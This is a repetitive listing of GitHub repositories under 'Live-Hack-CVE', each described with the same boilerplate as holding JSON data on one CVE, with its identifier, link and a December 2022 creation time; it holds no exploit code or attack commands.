**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40629 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40629](https://github.com/Live-Hack-CVE/CVE-2022-40629) create time: 2022-12-24T23:18:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40358 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40358](https://github.com/Live-Hack-CVE/CVE-2022-40358) create time: 2022-12-24T23:18:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2998 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2998](https://github.com/Live-Hack-CVE/CVE-2022-2998) create time: 2022-12-24T23:18:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-3352 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-3352](https://github.com/Live-Hack-CVE/CVE-2009-3352) create time: 2022-12-24T22:41:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-9129 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-9129](https://github.com/Live-Hack-CVE/CVE-2014-9129) create time: 2022-12-24T22:45:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-0886 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-0886](https://github.com/Live-Hack-CVE/CVE-2017-0886) create time: 2022-12-24T22:45:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-0884 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-0884](https://github.com/Live-Hack-CVE/CVE-2017-0884) create time: 2022-12-24T22:45:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-0887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-0887](https://github.com/Live-Hack-CVE/CVE-2017-0887) create time: 2022-12-24T22:45:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-0885 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-0885](https://github.com/Live-Hack-CVE/CVE-2017-0885) create time: 2022-12-24T22:45:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-0890 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-0890](https://github.com/Live-Hack-CVE/CVE-2017-0890) create time: 2022-12-24T22:43:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-0894 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-0894](https://github.com/Live-Hack-CVE/CVE-2017-0894) create time: 2022-12-24T22:42:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-0892 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-0892](https://github.com/Live-Hack-CVE/CVE-2017-0892) create time: 2022-12-24T22:42:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-8114 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-8114](https://github.com/Live-Hack-CVE/CVE-2017-8114) create time: 2022-12-24T22:41:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36521 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36521](https://github.com/Live-Hack-CVE/CVE-2020-36521) create time: 2022-12-24T22:46:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8152 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8152](https://github.com/Live-Hack-CVE/CVE-2020-8152) create time: 2022-12-24T22:43:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8259 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8259](https://github.com/Live-Hack-CVE/CVE-2020-8259) create time: 2022-12-24T22:43:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8293 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8293](https://github.com/Live-Hack-CVE/CVE-2020-8293) create time: 2022-12-24T22:43:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8236 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8236](https://github.com/Live-Hack-CVE/CVE-2020-8236) create time: 2022-12-24T22:43:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8173 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8173](https://github.com/Live-Hack-CVE/CVE-2020-8173) create time: 2022-12-24T22:43:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8183 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8183](https://github.com/Live-Hack-CVE/CVE-2020-8183) create time: 2022-12-24T22:43:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8225 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8225](https://github.com/Live-Hack-CVE/CVE-2020-8225) create time: 2022-12-24T22:43:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8230 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8230](https://github.com/Live-Hack-CVE/CVE-2020-8230) create time: 2022-12-24T22:43:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8229 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8229](https://github.com/Live-Hack-CVE/CVE-2020-8229) create time: 2022-12-24T22:43:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8227 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8227](https://github.com/Live-Hack-CVE/CVE-2020-8227) create time: 2022-12-24T22:43:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8140 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8140](https://github.com/Live-Hack-CVE/CVE-2020-8140) create time: 2022-12-24T22:42:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8189 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8189](https://github.com/Live-Hack-CVE/CVE-2020-8189) create time: 2022-12-24T22:42:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10919 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10919](https://github.com/Live-Hack-CVE/CVE-2020-10919) create time: 2022-12-24T22:41:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14562 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14562](https://github.com/Live-Hack-CVE/CVE-2020-14562) create time: 2022-12-24T22:38:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41437 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41437](https://github.com/Live-Hack-CVE/CVE-2021-41437) create time: 2022-12-24T22:46:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32802 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32802](https://github.com/Live-Hack-CVE/CVE-2021-32802) create time: 2022-12-24T22:44:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32801 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32801](https://github.com/Live-Hack-CVE/CVE-2021-32801) create time: 2022-12-24T22:44:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32800](https://github.com/Live-Hack-CVE/CVE-2021-32800) create time: 2022-12-24T22:44:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41233 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41233](https://github.com/Live-Hack-CVE/CVE-2021-41233) create time: 2022-12-24T22:44:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32766 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32766](https://github.com/Live-Hack-CVE/CVE-2021-32766) create time: 2022-12-24T22:44:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32728 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32728](https://github.com/Live-Hack-CVE/CVE-2021-32728) create time: 2022-12-24T22:44:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22877 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22877](https://github.com/Live-Hack-CVE/CVE-2021-22877) create time: 2022-12-24T22:43:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41003 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41003](https://github.com/Live-Hack-CVE/CVE-2021-41003) create time: 2022-12-24T22:42:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41002 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41002](https://github.com/Live-Hack-CVE/CVE-2021-41002) create time: 2022-12-24T22:41:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41001 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41001](https://github.com/Live-Hack-CVE/CVE-2021-41001) create time: 2022-12-24T22:41:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41000 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41000](https://github.com/Live-Hack-CVE/CVE-2021-41000) create time: 2022-12-24T22:41:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27242 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27242](https://github.com/Live-Hack-CVE/CVE-2021-27242) create time: 2022-12-24T22:41:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27271 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27271](https://github.com/Live-Hack-CVE/CVE-2021-27271) create time: 2022-12-24T22:41:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4063 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4063](https://github.com/Live-Hack-CVE/CVE-2021-4063) create time: 2022-12-24T22:39:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4079 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4079](https://github.com/Live-Hack-CVE/CVE-2021-4079) create time: 2022-12-24T22:39:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4078 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4078](https://github.com/Live-Hack-CVE/CVE-2021-4078) create time: 2022-12-24T22:39:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4068 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4068](https://github.com/Live-Hack-CVE/CVE-2021-4068) create time: 2022-12-24T22:39:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4067 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4067](https://github.com/Live-Hack-CVE/CVE-2021-4067) create time: 2022-12-24T22:38:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4066 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4066](https://github.com/Live-Hack-CVE/CVE-2021-4066) create time: 2022-12-24T22:38:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4065 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4065](https://github.com/Live-Hack-CVE/CVE-2021-4065) create time: 2022-12-24T22:38:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4064 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4064](https://github.com/Live-Hack-CVE/CVE-2021-4064) create time: 2022-12-24T22:38:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4062 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4062](https://github.com/Live-Hack-CVE/CVE-2021-4062) create time: 2022-12-24T22:38:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4061 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4061](https://github.com/Live-Hack-CVE/CVE-2021-4061) create time: 2022-12-24T22:38:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27876 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27876](https://github.com/Live-Hack-CVE/CVE-2021-27876) create time: 2022-12-24T22:38:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27878 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27878](https://github.com/Live-Hack-CVE/CVE-2021-27878) create time: 2022-12-24T22:38:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27877 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27877](https://github.com/Live-Hack-CVE/CVE-2021-27877) create time: 2022-12-24T22:38:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4059 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4059](https://github.com/Live-Hack-CVE/CVE-2021-4059) create time: 2022-12-24T22:38:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4058 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4058](https://github.com/Live-Hack-CVE/CVE-2021-4058) create time: 2022-12-24T22:37:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4057 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4057](https://github.com/Live-Hack-CVE/CVE-2021-4057) create time: 2022-12-24T22:37:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3069 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3069](https://github.com/Live-Hack-CVE/CVE-2022-3069) create time: 2022-12-24T22:48:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3062 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3062](https://github.com/Live-Hack-CVE/CVE-2022-3062) create time: 2022-12-24T22:48:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3135](https://github.com/Live-Hack-CVE/CVE-2022-3135) create time: 2022-12-24T22:48:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35097 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35097](https://github.com/Live-Hack-CVE/CVE-2022-35097) create time: 2022-12-24T22:48:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35096 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35096](https://github.com/Live-Hack-CVE/CVE-2022-35096) create time: 2022-12-24T22:48:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35092 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35092](https://github.com/Live-Hack-CVE/CVE-2022-35092) create time: 2022-12-24T22:48:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35098 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35098](https://github.com/Live-Hack-CVE/CVE-2022-35098) create time: 2022-12-24T22:48:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35099 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35099](https://github.com/Live-Hack-CVE/CVE-2022-35099) create time: 2022-12-24T22:48:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35095 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35095](https://github.com/Live-Hack-CVE/CVE-2022-35095) create time: 2022-12-24T22:48:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40107 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40107](https://github.com/Live-Hack-CVE/CVE-2022-40107) create time: 2022-12-24T22:47:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35091 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35091](https://github.com/Live-Hack-CVE/CVE-2022-35091) create time: 2022-12-24T22:47:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35093 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35093](https://github.com/Live-Hack-CVE/CVE-2022-35093) create time: 2022-12-24T22:47:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40103 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40103](https://github.com/Live-Hack-CVE/CVE-2022-40103) create time: 2022-12-24T22:47:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35094 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35094](https://github.com/Live-Hack-CVE/CVE-2022-35094) create time: 2022-12-24T22:47:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40104 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40104](https://github.com/Live-Hack-CVE/CVE-2022-40104) create time: 2022-12-24T22:47:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40102 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40102](https://github.com/Live-Hack-CVE/CVE-2022-40102) create time: 2022-12-24T22:47:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3076 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3076](https://github.com/Live-Hack-CVE/CVE-2022-3076) create time: 2022-12-24T22:47:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3070 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3070](https://github.com/Live-Hack-CVE/CVE-2022-3070) create time: 2022-12-24T22:47:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40106 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40106](https://github.com/Live-Hack-CVE/CVE-2022-40106) create time: 2022-12-24T22:47:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40100 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40100](https://github.com/Live-Hack-CVE/CVE-2022-40100) create time: 2022-12-24T22:47:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3098 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3098](https://github.com/Live-Hack-CVE/CVE-2022-3098) create time: 2022-12-24T22:47:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26707 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26707](https://github.com/Live-Hack-CVE/CVE-2022-26707) create time: 2022-12-24T22:47:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22629 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22629](https://github.com/Live-Hack-CVE/CVE-2022-22629) create time: 2022-12-24T22:47:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40403 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40403](https://github.com/Live-Hack-CVE/CVE-2022-40403) create time: 2022-12-24T22:46:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37234 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37234](https://github.com/Live-Hack-CVE/CVE-2022-37234) create time: 2022-12-24T22:46:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40404 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40404](https://github.com/Live-Hack-CVE/CVE-2022-40404) create time: 2022-12-24T22:46:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40402 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40402](https://github.com/Live-Hack-CVE/CVE-2022-40402) create time: 2022-12-24T22:46:44Z

